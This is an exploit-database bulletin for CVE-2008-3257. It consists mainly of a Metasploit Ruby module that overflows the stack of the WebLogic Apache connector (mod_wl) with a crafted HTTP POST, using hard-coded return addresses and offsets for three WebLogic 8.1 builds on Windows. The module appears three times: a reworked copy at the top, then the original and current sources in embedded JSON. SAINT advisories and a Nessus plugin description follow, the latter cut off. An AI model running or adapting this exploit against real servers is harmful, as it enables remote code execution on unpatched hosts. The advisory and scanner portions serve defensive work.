Oracle Weblogic Apache Connector POST Request Buffer Overflow
2012-05-19T00:00:00
ID EDB-ID:18897 Type exploitdb Reporter metasploit Modified 2012-05-19T00:00:00
Description
Oracle Weblogic Apache Connector POST Request Buffer Overflow. CVE-2008-3257. Remote exploit for the Windows platform.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'date'
require 'msf/core'
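class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  HttpFingerprint = { :pattern => [ /Apache/ ] }

  include Msf::Exploit::Remote::HttpClient

  # Known mod_wl_20.so builds that this module has a target entry for.
  # Each row is [name prefix used by the target list, build-stamp regex,
  # change-number regex]. Both regexes must match the bridge message for
  # the build to be reported as identified.
  KNOWN_BUILDS = [
    [ 'BEA WebLogic 8.1 SP6 - mod_wl_20.so',
      /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/,
      /Change Number:<\/B> <I>779586/ ],
    [ 'BEA WebLogic 8.1 SP5 - mod_wl_20.so',
      /Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/,
      /Change Number:<\/B> <I>616810/ ],
    [ 'BEA WebLogic 8.1 SP4 - mod_wl_20.so',
      /Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/,
      /Change Number:<\/B> <I>452998/ ]
  ].freeze

  # Plug-ins with a build date on or before this day are treated as
  # unpatched (same threshold as the original "Jul 28 2008" comparison).
  PATCH_DATE = Date.new(2008, 7, 28)

  # Loose "Mon DD YYYY" pattern used to pull a build date out of a bridge
  # message that does not match one of KNOWN_BUILDS.
  BUILD_DATE_RE = /([A-Za-z]{3} [\s\d]{2} [\d]{4})/

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle Weblogic Apache Connector POST Request Buffer Overflow',
      'Description'    => %q{
This module exploits a stack based buffer overflow in the BEA
Weblogic Apache plugin.
The connector fails to properly handle specially crafted HTTP POST
requests, resulting a buffer overflow due to the insecure usage
of sprintf. Currently, this module works over Windows systems without DEP,
and has been tested with Windows 2000 / XP.
In addition, the Weblogic Apache plugin version is fingerprinted with a POST
request containing a specially crafted Transfer-Encoding header.
},
      'Author'         =>
        [
          'KingCope',     # Vulnerability Discovery and PoC
          'juan vazquez', # Metasploit Module
        ],
      'Version'        => '$Revision: $',
      'References'     =>
        [
          [ 'CVE', '2008-3257' ],
          [ 'OSVDB', '47096' ],
          [ 'BID', '30273' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Privileged'     => true,
      'Platform'       => 'win',
      'Payload'        =>
        {
          'Space'    => 4000,
          'BadChars' => "\x00\x0d\x0a\x3f"
        },
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',
            {
              'Ret'    => 0x10061f63, # push esp # ret # mod_wl_20.so
              'Offset' => 4102
            }
          ],
          [ 'BEA WebLogic 8.1 SP5 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',
            {
              'Ret'    => 0x10061473, # push esp # ret # mod_wl_20.so
              'Offset' => 4102
            }
          ],
          [ 'BEA WebLogic 8.1 SP4 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',
            {
              'Ret'    => 0x10020e31, # push esp # ret # mod_wl_20.so
              'Offset' => 4102
            }
          ]
        ],
      'DisclosureDate' => 'Jul 17 2008',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI path to a jsp or object provided by Weblogic', '/index.jsp']),
      ], self.class)
  end

  # Map the fingerprint string to a CheckCode.
  #
  # A build-stamp match only shows that the installed plug-in is in the
  # affected range; nothing here confirms the overflow itself, so a
  # recognised build is reported as "Appears" rather than "Vulnerable".
  #
  # @return [Array] one of the Exploit::CheckCode values
  def check
    fingerprint = fingerprint_mod_wl
    print_status("#{rhost}:#{rport} - #{fingerprint}")

    case fingerprint
    when /Version found/, /BEA WebLogic connector vulnerable/
      Exploit::CheckCode::Appears
    when /BEA WebLogic connector undefined/
      Exploit::CheckCode::Detected
    when /BEA WebLogic connector no vulnerable/, /BEA WebLogic connector not found/
      Exploit::CheckCode::Safe
    else
      # fingerprint_mod_wl only returns the strings above; kept as a
      # defensive default.
      Exploit::CheckCode::Unknown
    end
  end

  def exploit
    # Autodetect BEA mod_wl version
    my_target = get_target

    # Avoid the attack if the victim doesn't have the same setup we're targeting
    if my_target.nil?
      print_error("BEA mod_weblogic not supported")
      return
    end

    uri = target_uri.path
    padding = my_target['Offset'] - uri.length
    # A TARGETURI longer than the target offset would hand
    # rand_text_alphanumeric a negative length; refuse instead.
    if padding < 0
      print_error("TARGETURI is longer than the target's offset")
      return
    end

    sploit = rand_text_alphanumeric(padding)
    sploit << [my_target.ret].pack("V")
    sploit << payload.encoded

    send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri} #{sploit}",
    })

    handler
  end

  # Resolve the 'Automatic' target to a concrete one via the fingerprint.
  #
  # @return [Msf::Module::Target, nil] the selected target, or nil when the
  #   remote plug-in build is not one this module has an entry for
  def get_target
    return target if target.name != 'Automatic'

    case fingerprint_mod_wl
    when /BEA WebLogic 8.1 SP6 - mod_wl_20.so/ then targets[1]
    when /BEA WebLogic 8.1 SP5 - mod_wl_20.so/ then targets[2]
    when /BEA WebLogic 8.1 SP4 - mod_wl_20.so/ then targets[3]
    end
  end

  # Send the fingerprinting POST and classify the plug-in from its
  # "Weblogic Bridge Message" response.
  #
  # @return [String] one of:
  #   "Version found: <build>"           exact build identified
  #   "BEA WebLogic connector vulnerable" build date on/before PATCH_DATE
  #   "BEA WebLogic connector no vulnerable"
  #   "BEA WebLogic connector undefined"  bridge message without a usable date
  #   "BEA WebLogic connector not found"  no bridge message in the reply
  def fingerprint_mod_wl
    my_data = rand_text_alpha(rand(5) + 8)
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => target_uri.path,
      'headers' =>
        {
          'Transfer-Encoding' => my_data
        },
      'data'    => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
    })

    unless res && res.code == 200 && res.body =~ /Weblogic Bridge Message/
      return "BEA WebLogic connector not found"
    end

    classify_bridge_message(res.body)
  end

  private

  # Turn a bridge-message body into one of the fingerprint strings.
  #
  # The original `when (/build/ and /change/)` form only ever tested the
  # change-number regex, because `and` on two truthy regex literals
  # evaluates to the second one; both patterns are checked here.
  #
  # @param body [String] response body containing the bridge message
  # @return [String] fingerprint string (see fingerprint_mod_wl)
  def classify_bridge_message(body)
    KNOWN_BUILDS.each do |name, build_re, change_re|
      return "Version found: #{name}" if body =~ build_re && body =~ change_re
    end

    # Check for dates prior to patch release
    m = body.match(BUILD_DATE_RE)
    build_date = m && parse_build_date(m[1])
    return "BEA WebLogic connector undefined" if build_date.nil?

    if build_date <= PATCH_DATE
      "BEA WebLogic connector vulnerable"
    else
      "BEA WebLogic connector no vulnerable"
    end
  end

  # Parse a server-supplied "Mon DD YYYY" string.
  #
  # The text comes from the remote response, so a non-date that still
  # matches BUILD_DATE_RE (e.g. "Foo 12 2008") must not abort the check.
  #
  # @param text [String]
  # @return [Date, nil] nil when the text is not a parseable date
  def parse_build_date(text)
    Date.parse(text)
  rescue ArgumentError
    nil
  end
end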
{"id": "EDB-ID:18897", "hash": "7aff689b35f6302232f4691520f08bad", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Oracle Weblogic Apache Connector POST Request Buffer Overflow", "description": "Oracle Weblogic Apache Connector POST Request Buffer Overflow. CVE-2008-3257. Remote exploit for windows platform", "published": "2012-05-19T00:00:00", "modified": "2012-05-19T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/18897/", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2008-3257"], "lastseen": "2016-02-02T10:39:39", "history": [], "viewCount": 17, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-3257"]}, {"type": "saint", "idList": ["SAINT:3731D876ADD116F969B63F8C1F9FB5C0", "SAINT:6763DC454040C45562777CCC7CC949A0", "SAINT:85AF372EEE4A6741D74279F33598EC73"]}, {"type": "nessus", "idList": ["WEBLOGIC_MOD_WL_OVERFLOW.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/BEA_WEBLOGIC_POST_BOF"]}, {"type": "exploitdb", "idList": ["EDB-ID:6089"]}, {"type": "cert", "idList": ["VU:716387"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:112864"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2008-100299", "ORACLE:CPUJAN2009-097901"]}], "modified": "2016-02-02T10:39:39"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/18897/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tHttpFingerprint = { :pattern => [ /Apache/ ] }\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Oracle Weblogic Apache Connector POST Request Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack based buffer overflow in the BEA\r\n\t\t\t\tWeblogic Apache plugin.\r\n\r\n\t\t\t\tThe connector fails to properly handle specially crafted HTTP POST\r\n\t\t\t\trequests, resulting a buffer overflow due to the insecure usage\r\n\t\t\t\tof sprintf. Currently, this module works over Windows systems without DEP,\r\n\t\t\t\tand has been tested with Windows 2000 / XP.\r\n\r\n\t\t\t\tIn addition, the Weblogic Apache plugin version is fingerprinted with a POST\r\n\t\t\t\trequest containing a specially crafted Transfer-Encoding header.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'KingCope', # Vulnerability Discovery and PoC\r\n\t\t\t\t\t'juan vazquez', # Metasploit Module\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2008-3257' ],\r\n\t\t\t\t\t[ 'OSVDB', '47096' ],\r\n\t\t\t\t\t[ 'BID', '30273' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 4000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0d\\x0a\\x3f\"\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {} ],\r\n\t\t\t\t\t[ 'BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x10061f63, # push esp # ret # 
mod_wl_20.so\r\n\t\t\t\t\t\t\t'Offset' => 4102\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'BEA WebLogic 8.1 SP5 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x10061473, # push esp # ret # mod_wl_20.so\r\n\t\t\t\t\t\t\t'Offset' => 4102\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'BEA WebLogic 8.1 SP4 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x10020e31, # push esp # ret # mod_wl_20.so\r\n\t\t\t\t\t\t\t'Offset' => 4102\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jul 17 2008',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('TARGETURI', [true, 'The URI path to a jsp or object provided by Weblogic', '/index.jsp']),\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\r\n\tdef check\r\n\r\n\t\tfingerprint = fingerprint_mod_wl\r\n\r\n\t\tcase fingerprint\r\n\t\twhen /Version found/\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\twhen /BEA WebLogic connector vulnerable/\r\n\t\t\treturn Exploit::CheckCode::Appears\r\n\t\twhen /BEA WebLogic connector undefined/\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\twhen /BEA WebLogic connector no vulnerable/, /BEA WebLogic connector not found/\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\t# Autodetect BEA mod_wl version\r\n\t\tmy_target = get_target\r\n\r\n\t\t# Avoid the attack if the victim doesn't have the same setup we're targeting\r\n\t\tif my_target.nil?\r\n\t\t\tprint_error(\"BEA mod_weblogic not supported\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\turi = target_uri.path\r\n\t\tsploit = rand_text_alphanumeric(my_target['Offset']-uri.length)\r\n\t\tsploit << [my_target.ret].pack(\"V\")\r\n\t\tsploit << payload.encoded\r\n\r\n\t\tsend_request_cgi({\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'uri' => \"#{uri} #{sploit}\",\r\n\t\t})\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\n\tdef 
get_target\r\n\r\n\t\treturn target if target.name != 'Automatic'\r\n\r\n\t\tfingerprint = fingerprint_mod_wl\r\n\r\n\t\tcase fingerprint\r\n\t\twhen /BEA WebLogic 8.1 SP6 - mod_wl_20.so/\r\n\t\t\treturn targets[1]\r\n\t\twhen /BEA WebLogic 8.1 SP5 - mod_wl_20.so/\r\n\t\t\treturn targets[2]\r\n\t\twhen /BEA WebLogic 8.1 SP4 - mod_wl_20.so/\r\n\t\t\treturn targets[3]\r\n\t\telse\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef fingerprint_mod_wl\r\n\r\n\t\tmy_data = rand_text_alpha(rand(5) + 8)\r\n\t\tres = send_request_cgi(\r\n\t\t\t\t{\r\n\t\t\t\t\t'method' => 'POST',\r\n\t\t\t\t\t'uri' => target_uri.path,\r\n\t\t\t\t\t'headers' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Transfer-Encoding' => my_data\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t'data' => \"#{my_data.length}\\r\\n#{my_data}\\r\\n0\\r\\n\",\r\n\t\t\t\t})\r\n\r\n\t\tif res and res.code == 200 and res.body =~ /Weblogic Bridge Message/\r\n\t\t\t# BEA WebLogic 8.1 SP6 - mod_wl_20.so\r\n\t\t\tcase res.body\r\n\t\t\twhen (/Build date\\/time:<\\/B> <I>Jun 16 2006 15:14:11/ and /Change Number:<\\/B> <I>779586/)\r\n\t\t\t\treturn \"Version found: BEA WebLogic 8.1 SP6 - mod_wl_20.so\"\r\n\t\t\t# BEA WebLogic 8.1 SP5 - mod_wl_20.so\r\n\t\t\twhen (/Build date\\/time:<\\/B> <I>Aug 5 2005 11:19:57/ and /Change Number:<\\/B> <I>616810/)\r\n\t\t\t\treturn \"Version found: BEA WebLogic 8.1 SP5 - mod_wl_20.so\"\r\n\t\t\twhen (/Build date\\/time:<\\/B> <I>Oct 25 2004 09:25:23/ and /Change Number:<\\/B> <I>452998/)\r\n\t\t\t\treturn \"Version found: BEA WebLogic 8.1 SP4 - mod_wl_20.so\"\r\n\t\t\t# Check for dates prior to patch release\r\n\t\t\twhen /([A-Za-z]{3} [\\s\\d]{2} [\\d]{4})/\r\n\t\t\t\tbuild_date = Date.parse($1)\r\n\t\t\t\tif build_date <= Date.parse(\"Jul 28 2008\")\r\n\t\t\t\t\treturn \"BEA WebLogic connector vulnerable\"\r\n\t\t\t\telse\r\n\t\t\t\t\treturn \"BEA WebLogic connector no vulnerable\"\r\n\t\t\t\tend\r\n\t\t\telse\r\n\t\t\t\treturn \"BEA WebLogic connector 
undefined\"\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\treturn \"BEA WebLogic connector not found\"\r\n\r\n\tend\r\n\r\nend\r\n", "osvdbidlist": ["47096"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-09-29T14:26:00", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after \"POST /.jsp\" in an HTTP request.", "modified": "2017-09-28T21:31:36", "published": "2008-07-22T12:41:00", "id": "CVE-2008-3257", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3257", "title": "CVE-2008-3257", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2018-09-19T05:41:25", "bulletinFamily": "exploit", "description": "This module exploits a stack based buffer overflow in the BEA Weblogic Apache plugin. The connector fails to properly handle specially crafted HTTP POST requests, resulting a buffer overflow due to the insecure usage of sprintf. Currently, this module works over Windows systems without DEP, and has been tested with Windows 2000 / XP. 
In addition, the Weblogic Apache plugin version is fingerprinted with a POST request containing a specially crafted Transfer-Encoding header.", "modified": "2017-07-24T13:26:21", "published": "2012-05-17T08:28:18", "id": "MSF:EXPLOIT/WINDOWS/HTTP/BEA_WEBLOGIC_POST_BOF", "href": "", "type": "metasploit", "title": "Oracle Weblogic Apache Connector POST Request Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n HttpFingerprint = { :pattern => [ /Apache/ ] }\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle Weblogic Apache Connector POST Request Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack based buffer overflow in the BEA\n Weblogic Apache plugin.\n\n The connector fails to properly handle specially crafted HTTP POST\n requests, resulting a buffer overflow due to the insecure usage\n of sprintf. 
Currently, this module works over Windows systems without DEP,\n and has been tested with Windows 2000 / XP.\n\n In addition, the Weblogic Apache plugin version is fingerprinted with a POST\n request containing a specially crafted Transfer-Encoding header.\n },\n 'Author' =>\n [\n 'KingCope', # Vulnerability Discovery and PoC\n 'juan vazquez', # Metasploit Module\n ],\n 'References' =>\n [\n [ 'CVE', '2008-3257' ],\n [ 'OSVDB', '47096' ],\n [ 'BID', '30273' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Privileged' => true,\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'Space' => 4000,\n 'BadChars' => \"\\x00\\x0d\\x0a\\x3f\"\n },\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',\n {\n 'Ret' => 0x10061f63, # push esp # ret # mod_wl_20.so\n 'Offset' => 4102\n }\n ],\n [ 'BEA WebLogic 8.1 SP5 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',\n {\n 'Ret' => 0x10061473, # push esp # ret # mod_wl_20.so\n 'Offset' => 4102\n }\n ],\n [ 'BEA WebLogic 8.1 SP4 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',\n {\n 'Ret' => 0x10020e31, # push esp # ret # mod_wl_20.so\n 'Offset' => 4102\n }\n ]\n ],\n 'DisclosureDate' => 'Jul 17 2008',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The URI path to a jsp or object provided by Weblogic', '/index.jsp']),\n ])\n\n end\n\n\n def check\n\n fingerprint = fingerprint_mod_wl\n print_status \"#{rhost}:#{rport} - #{fingerprint}\"\n\n case fingerprint\n when /Version found/\n return Exploit::CheckCode::Appears\n when /BEA WebLogic connector vulnerable/\n return Exploit::CheckCode::Appears\n when /BEA WebLogic connector undefined/\n return Exploit::CheckCode::Detected\n when /BEA WebLogic connector no vulnerable/, /BEA WebLogic connector not found/\n return Exploit::CheckCode::Safe\n end\n\n end\n\n def exploit\n\n # Autodetect BEA mod_wl version\n my_target = get_target\n\n # Avoid the attack if the victim 
doesn't have the same setup we're targeting\n if my_target.nil?\n print_error(\"BEA mod_weblogic not supported\")\n return\n end\n\n uri = normalize_uri(target_uri.path)\n sploit = rand_text_alphanumeric(my_target['Offset']-uri.length)\n sploit << [my_target.ret].pack(\"V\")\n sploit << payload.encoded\n\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"#{uri} #{sploit}\",\n })\n\n handler\n\n end\n\n def get_target\n\n return target if target.name != 'Automatic'\n\n fingerprint = fingerprint_mod_wl\n\n case fingerprint\n when /BEA WebLogic 8.1 SP6 - mod_wl_20.so/\n return targets[1]\n when /BEA WebLogic 8.1 SP5 - mod_wl_20.so/\n return targets[2]\n when /BEA WebLogic 8.1 SP4 - mod_wl_20.so/\n return targets[3]\n else\n return nil\n end\n\n end\n\n def fingerprint_mod_wl\n\n my_data = rand_text_alpha(rand(5) + 8)\n res = send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'headers' =>\n {\n 'Transfer-Encoding' => my_data\n },\n 'data' => \"#{my_data.length}\\r\\n#{my_data}\\r\\n0\\r\\n\",\n })\n\n if res and res.code == 200 and res.body =~ /Weblogic Bridge Message/\n # BEA WebLogic 8.1 SP6 - mod_wl_20.so\n case res.body\n when (/Build date\\/time:<\\/B> <I>Jun 16 2006 15:14:11/ and /Change Number:<\\/B> <I>779586/)\n return \"Version found: BEA WebLogic 8.1 SP6 - mod_wl_20.so\"\n # BEA WebLogic 8.1 SP5 - mod_wl_20.so\n when (/Build date\\/time:<\\/B> <I>Aug 5 2005 11:19:57/ and /Change Number:<\\/B> <I>616810/)\n return \"Version found: BEA WebLogic 8.1 SP5 - mod_wl_20.so\"\n when (/Build date\\/time:<\\/B> <I>Oct 25 2004 09:25:23/ and /Change Number:<\\/B> <I>452998/)\n return \"Version found: BEA WebLogic 8.1 SP4 - mod_wl_20.so\"\n # Check for dates prior to patch release\n when /([A-Za-z]{3} [\\s\\d]{2} [\\d]{4})/\n build_date = Date.parse($1)\n if build_date <= Date.parse(\"Jul 28 2008\")\n return \"BEA WebLogic connector vulnerable\"\n else\n return \"BEA WebLogic connector not vulnerable\"\n end\n else\n return \"BEA 
WebLogic connector undefined\"\n end\n end\n\n return \"BEA WebLogic connector not found\"\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/bea_weblogic_post_bof.rb"}], "saint": [{"lastseen": "2016-12-14T16:58:03", "bulletinFamily": "exploit", "description": "Added: 07/25/2008 \nCVE: [CVE-2008-3257](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3257>) \nBID: [30273](<http://www.securityfocus.com/bid/30273>) \nOSVDB: [47096](<http://www.osvdb.org/47096>) \n\n\n### Background\n\n[Oracle WebLogic Server](<http://www.bea.com/framework.jsp?CNT=index.htm&FP=/content/products/weblogic/>) (formerly BEA WebLogic Server) is a Java web application platform. \n\n### Problem\n\nA buffer overflow in the Apache Connector for WebLogic Server allows remote attackers to execute arbitrary commands by sending a long, specially crafted POST request. \n\n### Resolution\n\nApply a fix when available. \n\n### References\n\n<http://secunia.com/advisories/31146/> \n\n\n### Limitations\n\nExploit works on WebLogic Server 10.0. On Windows Server 2003, patch KB933729 (rpcrt4.dll version 5.2.3790.4115) must be installed. 
\n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "modified": "2008-07-25T00:00:00", "published": "2008-07-25T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/weblogic_apache_connector_post", "id": "SAINT:3731D876ADD116F969B63F8C1F9FB5C0", "title": "Oracle WebLogic Server Apache Connector POST buffer overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:01:53", "bulletinFamily": "exploit", "description": "Added: 07/25/2008 \nCVE: [CVE-2008-3257](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3257>) \nBID: [30273](<http://www.securityfocus.com/bid/30273>) \nOSVDB: [47096](<http://www.osvdb.org/47096>) \n\n\n### Background\n\n[Oracle WebLogic Server](<http://www.bea.com/framework.jsp?CNT=index.htm&FP=/content/products/weblogic/>) (formerly BEA WebLogic Server) is a Java web application platform. \n\n### Problem\n\nA buffer overflow in the Apache Connector for WebLogic Server allows remote attackers to execute arbitrary commands by sending a long, specially crafted POST request. \n\n### Resolution\n\nApply a fix when available. \n\n### References\n\n<http://secunia.com/advisories/31146/> \n\n\n### Limitations\n\nExploit works on WebLogic Server 10.0. On Windows Server 2003, patch KB933729 (rpcrt4.dll version 5.2.3790.4115) must be installed. 
\n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "modified": "2008-07-25T00:00:00", "published": "2008-07-25T00:00:00", "id": "SAINT:6763DC454040C45562777CCC7CC949A0", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/weblogic_apache_connector_post", "type": "saint", "title": "Oracle WebLogic Server Apache Connector POST buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:21", "bulletinFamily": "exploit", "description": "Added: 07/25/2008 \nCVE: [CVE-2008-3257](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3257>) \nBID: [30273](<http://www.securityfocus.com/bid/30273>) \nOSVDB: [47096](<http://www.osvdb.org/47096>) \n\n\n### Background\n\n[Oracle WebLogic Server](<http://www.bea.com/framework.jsp?CNT=index.htm&FP=/content/products/weblogic/>) (formerly BEA WebLogic Server) is a Java web application platform. \n\n### Problem\n\nA buffer overflow in the Apache Connector for WebLogic Server allows remote attackers to execute arbitrary commands by sending a long, specially crafted POST request. \n\n### Resolution\n\nApply a fix when available. \n\n### References\n\n<http://secunia.com/advisories/31146/> \n\n\n### Limitations\n\nExploit works on WebLogic Server 10.0. On Windows Server 2003, patch KB933729 (rpcrt4.dll version 5.2.3790.4115) must be installed. 
\n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "modified": "2008-07-25T00:00:00", "published": "2008-07-25T00:00:00", "id": "SAINT:85AF372EEE4A6741D74279F33598EC73", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/weblogic_apache_connector_post", "title": "Oracle WebLogic Server Apache Connector POST buffer overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:11:08", "bulletinFamily": "scanner", "description": "The Apache web server running on the remote host includes a version of the WebLogic plug-in for Apache (mod_wl) that is affected by a buffer overflow. This is an Apache module included with Oracle (formerly BEA) WebLogic Server and used to proxy requests from an Apache HTTP server to WebLogic. A remote attacker can leverage this issue to execute arbitrary code on the remote host. \n\nNote that Nessus has not tried to exploit this issue but rather has only checked the affected module's build timestamp. As a result, it will not detect if the remote implements one of the workarounds published by Oracle in its advisory. 
Still, it should be noted that the vendor strongly recommends updating the plug-in.", "modified": "2018-08-06T00:00:00", "id": "WEBLOGIC_MOD_WL_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=33932", "published": "2008-08-18T00:00:00", "title": "Oracle WebLogic Server mod_wl POST Request Remote Overflow", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(33932);\n script_version(\"1.22\");\n\n script_cve_id(\"CVE-2008-3257\");\n script_bugtraq_id(30273);\n script_xref(name:\"CERT\", value:\"716387\");\n script_xref(name:\"EDB-ID\", value:\"6089\");\n script_xref(name:\"Secunia\", value:\"31146\");\n\n script_name(english:\"Oracle WebLogic Server mod_wl POST Request Remote Overflow\");\n script_summary(english:\"Sends a POST request to get the plug-in's build timestamp\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a module that is affected by a buffer\noverflow vulnerability.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The Apache web server running on the remote host includes a version of\nthe WebLogic plug-in for Apache (mod_wl) that is affected by a buffer\noverflow. This is an Apache module included with Oracle (formerly BEA)\nWebLogic Server and used to 